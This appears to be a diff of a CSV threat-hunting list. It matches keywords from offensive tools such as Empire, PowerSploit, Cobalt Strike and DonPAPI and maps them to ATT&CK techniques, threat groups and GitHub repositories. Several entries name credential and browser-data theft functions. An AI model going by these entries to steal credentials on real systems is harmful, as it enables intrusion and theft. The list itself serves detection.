+"*Get-BrowserData.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-BrowserInformation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetC2Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*Get-CachedGPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-CachedGPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-CachedRDPConnection*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Get-CachedRDPConnection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-ChromeBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ChromeHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*GetChromeSecrets*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*GETCLIPBOARD*GETLOCALGROUP*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*Get-ClipboardContents*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
-"*Get-ClipboardContents.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-CachedRDPConnection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ChromeBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*GetChromeSecrets*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*GETCLIPBOARD*GETLOCALGROUP*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Get-ClipboardContents*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
